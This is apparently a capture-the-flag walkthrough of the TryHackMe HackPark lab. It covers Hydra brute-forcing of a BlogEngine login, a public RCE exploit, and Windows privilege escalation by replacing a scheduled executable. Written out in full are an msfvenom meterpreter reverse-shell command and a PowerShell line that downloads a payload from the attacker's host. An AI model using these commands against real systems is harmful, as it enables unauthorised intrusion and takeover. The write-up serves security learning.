HackPark - HackMD

###### tags: `TryHackMe OffensiveSecurity AdvancedExploitation` # HackPark :::info This room will cover brute-forcing an accounts credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows. ::: ## Using hydra to brute-fore a login Hydra is a parallelized, fast and flexible login cracker. If you don't have Hydra installed or need a Linux machine to use it, you can deploy a powerful Kali Linux machine and control it in your browser! Brute-forcing can be trying every combination of a password. Dictionary-attack's are also a type of brute-forcing, where we iterating through a wordlist to obtain the password. ![](https://i.imgur.com/B4QQyCH.png) We need to find a login page to attack and identify what type of request the form is making to the webserver. Typically, web servers make two types of requests, a **GET** request which is used to request data from a webserver and a **POST** request which is used to send data to a server. We can check what request a form is making by right clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found [here](https://www.w3schools.com/tags/ref_httpmethods.asp)). Here is the login form we find : ![](https://i.imgur.com/uRTyyIw.png) I fill it with random values and intercept the request with BurpSuite in order to know what request type is the Windows website login form using. ![](https://i.imgur.com/DVdaLRB.png) We can see that the form is using a **post** method. Now we know the request type and have a URL for the login form, we can get started brute-forcing an account. To do it, we'll use **hydra** like told before. **Hydra** really does have lots of functionality, and there are many "modules" available (an example of a module would be the `http-post-form` that we will use). However, this tool is not only good for brute-forcing HTTP forms, but other protocols such as FTP, SSH, SMTP, SMB and more. Below is a mini cheatsheet: ![](https://i.imgur.com/5JyLZN1.png) The command we use : ![](https://i.imgur.com/Sn4SvC2.png) ![](https://i.imgur.com/vD3Dr3P.png) When using the command I guess that the user name was : **admin**. Doing it, i find the password used which is ***`1quaz2wsx`***. :::success I can now login like the admin : ::: ![](https://i.imgur.com/zbCEWDK.png) ## Compromising the machine In this task, I will identify and execute a public exploit (from exploit-db.com) to get an initial access on this Windows machine! 1. First i will dentify the version of the BlogEngine : ![](https://i.imgur.com/dGi8qWN.png) - Version : 3.3.6.0 2. Use the `searchsploit` command to find any vulnerabilities related to this version - `searchsploit BlogEngine` ![](https://i.imgur.com/VVy2aCu.png) I find there is a remote code execution vulnerability associated to the version of BlogEngine we have. I download the associated exploit by using this command : - `searchsploit -m "name of the exploit"` ![](https://i.imgur.com/JVLoaZY.png) After reading the exploit code, i modify some points like the IP and the port where we will be listening to... The author of the exploit also advices us to modify the name of the file, what i do. Now the exploit is ready, i lunch a tcp client with **netcat** where we will listen to the IP and port associated to the exploit. ![](https://i.imgur.com/l0Mwmp3.png) Let's upload the exploit in the webApp and trigger it : ![](https://i.imgur.com/m3bjrac.png) ![](https://i.imgur.com/Kko3Deo.png) After triggering the exploit i gain an initial access : ![](https://i.imgur.com/Q0xN8s0.png) ## Privilege escalation First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator. Our netcat session is a little unstable, so lets generate another reverse shell using **msfvenom**. ### Pivot from netcat to meterpreter 1. Create the reverse shell with msfvenom `msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.33.232 LPORT=2345 -f exe -o shell.exe` ![](https://i.imgur.com/zqpz8mt.png) 2. Create a webserver with python to enable downloading the shell from the initial netcat shell ![](https://i.imgur.com/eR9Ol0x.png) 3. Use metasploit to listen to the upcoming connection ![](https://i.imgur.com/oUoxbod.png) 4. Download the reverse shell and start it in the netact session `powershell -c "Invoke-WebRequest -Uri 'http://10.11.33.232:8000/shell.exe' -OutFile 'c:\windows\temp\shell.exe'"` ![](https://i.imgur.com/Y1QLphw.png) 5. Back to metasploit and see the meterpreter shell ![](https://i.imgur.com/djg820G.png) From here, I can run metasploit commands such as `sysinfo` to get detailed information about the Windows system... ![](https://i.imgur.com/CrKylLf.png) Using the ps command to look at running process i found out an *abnormal service* running : `Windowscheduler`. Then, from the WindowsScheduler logs, we see that `Message.exe` is executed about every 30 seconds as `administrator` : ![](https://i.imgur.com/SJlYJIc.png) We can take advantage of this to replace Message.exe with our reverse shell so that it is executed as adminstrator. 1. Create another reverse shell with msfvenom with the name Message.exe ![](https://i.imgur.com/INDzcA4.png) 2. Download the new Message.exe in the same directory where the authenticate is ![](https://i.imgur.com/iVsbxIZ.png) 3. Use metasploit to listen to the new connection with the new port and wait :::success After some seconds, we have a meterpreter as Administrator. :::